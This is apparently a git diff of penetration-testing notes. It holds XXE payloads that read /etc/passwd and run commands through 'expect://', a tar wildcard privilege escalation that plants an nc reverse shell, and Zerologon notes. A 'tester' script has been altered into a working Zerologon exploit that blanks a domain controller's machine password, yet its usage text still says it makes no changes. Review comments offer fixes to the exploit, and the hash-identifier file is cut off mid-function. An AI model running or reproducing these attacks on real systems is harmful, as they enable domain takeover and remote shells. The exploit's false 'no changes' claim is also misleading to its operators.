* !ELEMENT note - Defines that the note element must contain the elements: "to, from, heading, body"
|
||||||
|
* !ELEMENT to - Defines the `to` element to be of type "#PCDATA"
|
||||||
|
* !ELEMENT from - Defines the `from` element to be of type "#PCDATA"
|
||||||
|
* !ELEMENT heading - Defines the `heading` element to be of type "#PCDATA"
|
||||||
|
* !ELEMENT body - Defines the `body` element to be of type "#PCDATA"
|
||||||
|
|
||||||
|
|
||||||
|
NOTE: #PCDATA means parseable character data.
|
||||||
|
|
||||||
|
* Resulting XML doc follows
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<!DOCTYPE note SYSTEM "note.dtd">
|
||||||
|
<note>
|
||||||
|
<to>falcon</to>
|
||||||
|
<from>feast</from>
|
||||||
|
<heading>hacking</heading>
|
||||||
|
<body>XXE attack</body>
|
||||||
|
</note>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Replacing XML content
|
||||||
|
* Name in the example
|
||||||
|
```xml
|
||||||
|
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
|
||||||
|
<userInfo>
|
||||||
|
<firstName>falcon</firstName>
|
||||||
|
<lastName>&name;</lastName>
|
||||||
|
</userInfo>
|
||||||
|
```
|
||||||
|
* System call inside entity
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
|
||||||
|
<root>
|
||||||
|
<name>sdafsa</name>
|
||||||
|
<tel>789731421</tel>
|
||||||
|
<email>&xxe;</email>
|
||||||
|
<password>12345</password>
|
||||||
|
</root>
|
||||||
|
```
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
|
||||||
|
<root>&read;</root>
|
||||||
|
```
|
||||||
|
|
||||||
|
* PHP expect using syscalls
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE foo [ <!ELEMENT foo ANY >
|
||||||
|
<!ENTITY xxe SYSTEM "expect://id" >]>
|
||||||
|
<root>
|
||||||
|
<email>&xxe;</email>
|
||||||
|
<password>12345</password>
|
||||||
|
</root>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#classic-xxe)
|
|
@ -0,0 +1,13 @@
|
||||||
|
# Wildcard usage
|
||||||
|
* [Leon Juranic has shown it](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
|
||||||
|
|
||||||
|
## Another Example
|
||||||
|
|
||||||
|
* cronjob gets backup data from `/var/www/html` via `tar cf backup.tar *`. The reverse shell and the parameters need to be files in this directory to get called by tar and be executed.
|
||||||
|
|
||||||
|
```sh
|
||||||
|
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh
|
||||||
|
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
|
||||||
|
touch "/var/www/html/--checkpoint=1"
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,4 @@
|
||||||
|
# Impacket
|
||||||
|
|
||||||
|
* [Repo](https://github.com/SecureAuthCorp/impacket)
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 6da655ca9ac4f9c2a207ea47e79d089044accd78
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 2b944b52ee30f8833a21f0805d2627ca1f15383a
|
|
@ -0,0 +1,57 @@
|
||||||
|
# Zero Logon
|
||||||
|
|
||||||
|
[CVE-2020-1472](http://cve.circl.lu/cve/CVE-2020-1472)
|
||||||
|
|
||||||
|
## MS-NRPC (Microsoft NetLogon Remote Protocol)
|
||||||
|
* ComputeNetlogonCredential
|
||||||
|
* IV is `0` of AES-CFB8
|
||||||
|
* Machine accounts got no limit on failed login attempts (64 bit alnum password)
|
||||||
|
|
||||||
|
## Kill Chain
|
||||||
|
Zero Logon to bypass authentication on the Domain Controller's Machine Account -> Run `Secretsdump.py` to dump credentials -> Crack/Pass Domain Admin Hashes -> ??? -> Profit
|
||||||
|
|
||||||
|
## MS-NRPC Logon
|
||||||
|
* Netlogon handshake between Client (domain-joined computer) and Server (domain-controller).
|
||||||
|
* RPC traffic
|
||||||
|
```mermaid
|
||||||
|
sequenceDiagram
|
||||||
|
participant Client
|
||||||
|
participant Server
|
||||||
|
Client ->> Server: Client challenge
|
||||||
|
Server ->> Client: Server challenge, Session Key = KDF(secret, challenges)
|
||||||
|
Client ->> Server: Client credential, Encrypt(K_sess, client challenge)
|
||||||
|
Server ->> Client: Client credential, Encrypt(K_sess, client challenge)
|
||||||
|
Client ->> Server: Signed + sealed with session key: Procedure call with authenticator
|
||||||
|
```
|
||||||
|
|
||||||
|
* Zero Logon attack. Zeroing parameters and retrying handshakes with an empty password on the domain controller.
|
||||||
|
```mermaid
|
||||||
|
sequenceDiagram
|
||||||
|
participant Client
|
||||||
|
participant Server
|
||||||
|
Client ->> Server: NetrServerReqChallenge (challenge=0000...00)
|
||||||
|
Server ->> Client: Server Challenge
|
||||||
|
Client ->> Server: NetrServerAuthenticate3 (identity=DC; credential=0000...00; sign/seal=0)
|
||||||
|
Server ->> Client: OK
|
||||||
|
Client ->> Server: NetrServerPasswordSet2 (target=DC; authenticator=0000...00; timestamp=0; enc.password=0000...00)
|
||||||
|
```
|
||||||
|
|
||||||
|
1. Client sends 16 Bytes of `0` as Nonce to domain-controller
|
||||||
|
2. Server receives NetServerReqChallenge and generates challenge (Nonce). Sends it to the client.
|
||||||
|
3. __NetrServerAuthenticate3__ method is generated as NetLogon credentials. Contains the following
|
||||||
|
1. __Custom Binding Handle__
|
||||||
|
2. __Account Name__
|
||||||
|
3. __Secure Channel Type__, nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
|
||||||
|
4. __Computer Name__, Domain Controller DC01
|
||||||
|
5. __Client Credential String__, 16 Bytes of `\x00`
|
||||||
|
6. __Negotiation Flags__, value observed from a Win10 client with Sign/Seal flags disabled: 0x212fffff Provided by Secura
|
||||||
|
|
||||||
|
4. NetrServerAuthenticate is received by server. Responds success if positive to the client.
|
||||||
|
5. If same values is calculated by the server, mutual agreement is confirmed by the client as well.
|
||||||
|
|
||||||
|
## PoC
|
||||||
|
* [Secura's PoC](https://github.com/SecuraBV/CVE-2020-1472)
|
||||||
|
* [NetrServerPasswordSet2](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81)
|
||||||
|
* [NetServerAuthenticate3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/3a9ed16f-8014-45ae-80af-c0ecb06e2db9)
|
||||||
|
* [Authenticator](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/76c93227-942a-4687-ab9d-9d972ffabdab)
|
||||||
|
* [NETLOGON_CREDENTIALS](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/d55e2632-7163-4f6c-b662-4b870e8cc1cd)
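Review bot: In the first sequence diagram the fourth arrow `Server ->> Client: Client credential, Encrypt(K_sess, client challenge)` repeats the client's message; the server replies with its own credential, `Server ->> Client: Server credential, Encrypt(K_sess, server challenge)`, which is what the client verifies for mutual authentication. The kill chain `Crack/Pass Domain Admin Hashes -> ??? -> Profit` omits the step that matters operationally: the exploit overwrites the DC machine account password with an empty one, so the original must be recovered (the `$MACHINE.ACC` LSA secret that secretsdump reads from the DC) and restored, otherwise replication and the DC's own Kerberos break. `64 bit alnum password` looks wrong — machine account passwords are long random strings (120 characters on current Windows, as far as I recall), and the bullet's real point is that with no lockout the 1-in-256 all-zero key/IV property of AES-CFB8 is brute-forced in ~256 attempts regardless of password strength; saying that makes the bullet self-contained.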
|
|
@ -0,0 +1,100 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
from impacket.dcerpc.v5 import nrpc, epm
|
||||||
|
from impacket.dcerpc.v5.dtypes import NULL
|
||||||
|
from impacket.dcerpc.v5 import transport
|
||||||
|
from impacket import crypto
|
||||||
|
|
||||||
|
import hmac, hashlib, struct, sys, socket, time
|
||||||
|
from binascii import hexlify, unhexlify
|
||||||
|
from subprocess import check_call
|
||||||
|
|
||||||
|
# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be neccessary on average.
|
||||||
|
MAX_ATTEMPTS = 2000 # False negative chance: 0.04%
|
||||||
|
|
||||||
|
def fail(msg):
|
||||||
|
print(msg, file=sys.stderr)
|
||||||
|
print('This might have been caused by invalid arguments or network issues.', file=sys.stderr)
|
||||||
|
sys.exit(2)
|
||||||
|
|
||||||
|
def try_zero_authenticate(dc_handle, dc_ip, target_computer):
|
||||||
|
# Connect to the DC's Netlogon service.
|
||||||
|
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
|
||||||
|
rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
|
||||||
|
rpc_con.connect()
|
||||||
|
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
|
||||||
|
|
||||||
|
# Use an all-zero challenge and credential.
|
||||||
|
plaintext = b'\x00' * 8
|
||||||
|
ciphertext = b'\x00' * 8
|
||||||
|
|
||||||
|
# Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
|
||||||
|
flags = 0x212fffff
|
||||||
|
|
||||||
|
# Send challenge and authentication request.
|
||||||
|
nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext)
|
||||||
|
try:
|
||||||
|
server_auth = nrpc.hNetrServerAuthenticate3(
|
||||||
|
rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
|
||||||
|
target_computer + '\x00', ciphertext, flags
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
# It worked!
|
||||||
|
assert server_auth['ErrorCode'] == 0
|
||||||
|
# ADDED BY mnemonic_daemon
|
||||||
|
#
|
||||||
|
newPassRequest = nrpc.NetrServerPasswordSet2()
|
||||||
|
newPassRequest['PrimaryName'] = dc_handle + '\x00'
|
||||||
|
newPassRequest['AccountName'] = target_computer + '$\x00'
|
||||||
|
newPassRequest['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
|
||||||
|
auth = nrpc.NETLOGON_AUTHENTICATOR()
|
||||||
|
auth['Credential'] = b'\x00' * 8
|
||||||
|
auth['Timestamp'] = 0
|
||||||
|
newPassRequest['Authenticator'] = auth
|
||||||
|
newPassRequest['ComputerName'] = target_computer + '\x00'
|
||||||
|
newPassRequest['ClearNewPassword'] = b'\x00' * 516
|
||||||
|
rpc_con.request(newPassRequest)
|
||||||
|
return rpc_con
|
||||||
|
|
||||||
|
except nrpc.DCERPCSessionError as ex:
|
||||||
|
# Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
|
||||||
|
if ex.get_error_code() == 0xc0000022:
|
||||||
|
return None
|
||||||
|
else:
|
||||||
|
fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
|
||||||
|
except BaseException as ex:
|
||||||
|
fail(f'Unexpected error: {ex}.')
|
||||||
|
|
||||||
|
|
||||||
|
def perform_attack(dc_handle, dc_ip, target_computer):
|
||||||
|
# Keep authenticating until succesfull. Expected average number of attempts needed: 256.
|
||||||
|
print('Performing authentication attempts...')
|
||||||
|
rpc_con = None
|
||||||
|
for attempt in range(0, MAX_ATTEMPTS):
|
||||||
|
rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
|
||||||
|
|
||||||
|
if rpc_con == None:
|
||||||
|
print('=', end='', flush=True)
|
||||||
|
else:
|
||||||
|
break
|
||||||
|
|
||||||
|
if rpc_con:
|
||||||
|
print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
|
||||||
|
else:
|
||||||
|
print('\nAttack failed. Target is probably patched.')
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
if not (3 <= len(sys.argv) <= 4):
|
||||||
|
print('Usage: zerologon_tester.py <dc-name> <dc-ip>\n')
|
||||||
|
print('Tests whether a domain controller is vulnerable to the Zerologon attack. Does not attempt to make any changes.')
|
||||||
|
print('Note: dc-name should be the (NetBIOS) computer name of the domain controller.')
|
||||||
|
sys.exit(1)
|
||||||
|
else:
|
||||||
|
[_, dc_name, dc_ip] = sys.argv
|
||||||
|
|
||||||
|
dc_name = dc_name.rstrip('$')
|
||||||
|
perform_attack('\\\\' + dc_name, dc_ip, dc_name)
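Review bot: The block after `assert server_auth['ErrorCode'] == 0` sends `NetrServerPasswordSet2` with a 516-byte zero buffer, which resets the DC machine account password to empty, yet the usage text still says `Does not attempt to make any changes.` and `perform_attack` still reports `DC can be fully compromised` as if nothing had happened; this is now an exploit, and both messages should say so and tell the operator to restore the original password (recoverable from the `$MACHINE.ACC` LSA secret) or the DC's replication and Kerberos break. The result of `rpc_con.request(newPassRequest)` is discarded — check `resp['ErrorCode'] == 0` before returning the connection, since a non-zero result means authentication worked but the password was not changed. The argument check `3 <= len(sys.argv) <= 4` admits four arguments but `[_, dc_name, dc_ip] = sys.argv` raises ValueError on four; make the check `len(sys.argv) == 3`. `except BaseException` also swallows KeyboardInterrupt and turns Ctrl-C into `Unexpected error`; catch `Exception` instead.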
|
||||||
|
|
|
@ -0,0 +1,592 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
# encoding: utf-8
|
||||||
|
# Hash Identifier
|
||||||
|
# By Zion3R
|
||||||
|
# www.Blackploit.com
|
||||||
|
# Root@Blackploit.com
|
||||||
|
|
||||||
|
from builtins import input
|
||||||
|
from sys import argv, exit
|
||||||
|
|
||||||
|
version = 1.2
|
||||||
|
|
||||||
|
logo=''' #########################################################################
|
||||||
|
# __ __ __ ______ _____ #
|
||||||
|
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
|
||||||
|
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
|
||||||
|
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
|
||||||
|
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
|
||||||
|
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
|
||||||
|
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v'''+str(version)+''' #
|
||||||
|
# By Zion3R #
|
||||||
|
# www.Blackploit.com #
|
||||||
|
# Root@Blackploit.com #
|
||||||
|
#########################################################################'''
|
||||||
|
|
||||||
|
algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", 
"106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"}
|
||||||
|
|
||||||
|
# hash.islower() minusculas
|
||||||
|
# hash.isdigit() numerico
|
||||||
|
# hash.isalpha() letras
|
||||||
|
# hash.isalnum() alfanumerico
|
||||||
|
|
||||||
|
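# 16-bit checksums. Each checker appends its ID to the module-level list `jerar`
# when the input has the right length and character set. The original predicates
# (isalpha()==False, isalnum()==True, sometimes isdigit()==False) accepted any
# alphanumeric string, letters g-z included, and rejected genuine hex values that
# happen to be all digits or all letters a-f; a strict hex-digit check replaces them.

def CRC16(hash):
    """CRC-16 (101020): 4 hex chars, e.g. 4607."""
    if len(hash) == 4 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("101020")


def CRC16CCITT(hash):
    """CRC-16-CCITT (101040): 4 hex chars, e.g. 3d08."""
    if len(hash) == 4 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("101040")


def FCS16(hash):
    """FCS-16 (101060): 4 hex chars, e.g. 0e5b."""
    if len(hash) == 4 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("101060")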
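# 32-bit checksums. Each checker appends its ID to the module-level list `jerar`.
# The original isdigit()/isalpha()/isalnum() combination accepted any alphanumeric
# string (letters g-z included) and rejected valid all-digit or all-a-f values;
# a strict hex-digit check replaces it.

def CRC32(hash):
    """CRC-32 (102040): 8 hex chars, e.g. b33fd057."""
    if len(hash) == 8 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("102040")


def ADLER32(hash):
    """ADLER-32 (102020): 8 hex chars, e.g. 0607cb42."""
    if len(hash) == 8 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("102020")


def CRC32B(hash):
    """CRC-32B (102060): 8 hex chars, e.g. b764a0d9."""
    if len(hash) == 8 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("102060")


def XOR32(hash):
    """XOR-32 (102080): 8 hex chars, e.g. 0000003f."""
    if len(hash) == 8 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("102080")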
# GHash-32 values are 8 decimal digits. isdigit() being true already implies the
# original's isalpha()==False and isalnum()==True, so only it is tested.
# NOTE: str.isdigit() also accepts non-ASCII digit characters; the original had
# the same property.

def GHash323(hash):
    """GHash-32-3 (103040): 8 decimal digits, e.g. 80000000."""
    if len(hash) == 8 and hash.isdigit():
        jerar.append("103040")


def GHash325(hash):
    """GHash-32-5 (103020): 8 decimal digits, e.g. 85318985."""
    if len(hash) == 8 and hash.isdigit():
        jerar.append("103020")
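def DESUnix(hash):
    """DES(Unix) crypt(3) (104020): 13 chars from the crypt alphabet [./0-9A-Za-z],
    e.g. ZiY8YtDKXJwYQ (2-char salt followed by 11 hash chars).

    The original only required length 13 plus "not all digits / not all letters",
    which let through any 13-char string containing punctuation or spaces and
    rejected the perfectly valid all-letter outputs that a 64-symbol alphabet
    produces. The character set is now checked explicitly.
    """
    if len(hash) == 13 and set(hash) <= set(
        "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    ):
        jerar.append("104020")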
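# 64-bit (16 hex char) formats. Each checker appends its ID to the module-level
# list `jerar`. The original isdigit()/isalpha()/isalnum() combination accepted
# any alphanumeric string and rejected valid all-digit or all-a-f values; a
# strict hex-digit check replaces it.

def MD5Half(hash):
    """MD5(Half) (105060): 16 hex chars, e.g. ae11fd697ec92c7c."""
    if len(hash) == 16 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("105060")


def MD5Middle(hash):
    """MD5(Middle) (105040): 16 hex chars, e.g. 7ec92c7c98de3fac."""
    if len(hash) == 16 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("105040")


def MySQL(hash):
    """MySQL (105020): 16 hex chars, e.g. 63cea4673fd25f46."""
    if len(hash) == 16 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("105020")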
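# 128-bit (32 hex char) digests. Each checker appends its ID to the module-level
# list `jerar`. The original isdigit()/isalpha()/isalnum() combination accepted
# any 32-char alphanumeric string (letters g-z included) and rejected valid
# digests that happen to be all digits or all letters a-f; a strict hex-digit
# check replaces it.

def DomainCachedCredentials(hash):
    """Domain Cached Credentials (106025): 32 hex chars, e.g. f42005ec1afe77967cbc83dce1b4d714."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106025")


def Haval128(hash):
    """Haval-128 (106160): 32 hex chars, e.g. d6e3ec49aa0f138a619f27609022df10."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106160")


def Haval128HMAC(hash):
    """Haval-128(HMAC) (106165): 32 hex chars, e.g. 3ce8b0ffd75bc240fc7d967729cd6637."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106165")


def MD2(hash):
    """MD2 (106060): 32 hex chars, e.g. 08bbef4754d98806c373f2cd7d9a43c4."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106060")


def MD2HMAC(hash):
    """MD2(HMAC) (106120): 32 hex chars, e.g. 4b61b72ead2b0eb0fa3b8a56556a6dca."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106120")


def MD4(hash):
    """MD4 (106040): 32 hex chars, e.g. a2acde400e61410e79dacbdfc3413151."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106040")


def MD4HMAC(hash):
    """MD4(HMAC) (106100): 32 hex chars, e.g. 6be20b66f2211fe937294c1c95d1cd4f."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106100")


def MD5(hash):
    """MD5 (106020): 32 hex chars, e.g. ae11fd697ec92c7c98de3fac23aba525."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106020")


def MD5HMAC(hash):
    """MD5(HMAC) (106080): 32 hex chars, e.g. d57e43d2c7e397bf788f66541d6fdef9."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106080")


def MD5HMACWordpress(hash):
    """MD5(HMAC(Wordpress)) (106140): 32 hex chars, e.g. 3f47886719268dfa83468630948228f6."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106140")


def NTLM(hash):
    """NTLM (106029): 32 hex chars, e.g. cc348bace876ea440a28ddaeb9fd3550."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106029")


def RAdminv2x(hash):
    """RAdmin v2.x (106027): 32 hex chars, e.g. baea31c728cbf0cd548476aa687add4b."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106027")


def RipeMD128(hash):
    """RipeMD-128 (106180): 32 hex chars, e.g. 4985351cd74aff0abc5a75a0c8a54115."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106180")


def RipeMD128HMAC(hash):
    """RipeMD-128(HMAC) (106185): 32 hex chars, e.g. ae1995b931cf4cbcf1ac6fbf1a83d1d3."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106185")


def SNEFRU128(hash):
    """SNEFRU-128 (106200): 32 hex chars, e.g. 4fb58702b617ac4f7ca87ec77b93da8a."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106200")


def SNEFRU128HMAC(hash):
    """SNEFRU-128(HMAC) (106205): 32 hex chars, e.g. 59b2b9dcc7a9a7d089cecf1b83520350."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106205")


def Tiger128(hash):
    """Tiger-128 (106220): 32 hex chars, e.g. c086184486ec6388ff81ec9f23528727."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106220")


def Tiger128HMAC(hash):
    """Tiger-128(HMAC) (106225): 32 hex chars, e.g. c87032009e7c4b2ea27eb6f99723454b."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106225")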
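# Salted / nested MD5 constructions: all produce a 32 hex char digest, so every
# checker in this group fires on the same inputs and only the ID differs. Each
# appends its ID to the module-level list `jerar`. The original
# isdigit()/isalpha()/isalnum() combination accepted any 32-char alphanumeric
# string and rejected valid all-digit or all-a-f digests; a strict hex-digit
# check replaces it.

def md5passsalt(hash):
    """md5($pass.$salt) (106240): 32 hex chars, e.g. 5634cc3b922578434d6e9342ff5913f7."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106240")


def md5saltmd5pass(hash):
    """md5($salt.'-'.md5($pass)) (106260): 32 hex chars, e.g. 245c5763b95ba42d4b02d44bbcd916f1.

    FIXME: this definition is shadowed by the second `md5saltmd5pass` further down
    (ID 106340), so 106260 is never reported. Fixing that needs a rename here AND
    in the dispatch list of the main loop, which calls md5saltmd5pass twice.
    """
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106260")


def md5saltpass(hash):
    """md5($salt.$pass) (106280): 32 hex chars, e.g. 22cc5ce1a1ef747cd3fa06106c148dfa."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106280")


def md5saltpasssalt(hash):
    """md5($salt.$pass.$salt) (106300): 32 hex chars, e.g. 469e9cdcaff745460595a7a386c4db0c."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106300")


def md5saltpassusername(hash):
    """md5($salt.$pass.$username) (106320): 32 hex chars, e.g. 9ae20f88189f6e3a62711608ddb6f5fd."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106320")


def md5saltmd5pass(hash):
    """md5($salt.md5($pass)) (106340): 32 hex chars, e.g. aca2a052962b2564027ee62933d2382f.

    NOTE: this is the definition that wins; it shadows the earlier
    `md5saltmd5pass` (106260). Because the main loop calls the name twice,
    106340 is currently reported twice and 106260 never.
    """
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106340")


def md5saltmd5passsalt(hash):
    """md5($salt.md5($pass).$salt) (106360): 32 hex chars, e.g. de0237dc03a8efdf6552fbe7788b2fdd.

    FIXME: shadowed by the second `md5saltmd5passsalt` below (ID 106380), so
    106360 is never reported; a rename here and in the main loop's dispatch list
    is required.
    """
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
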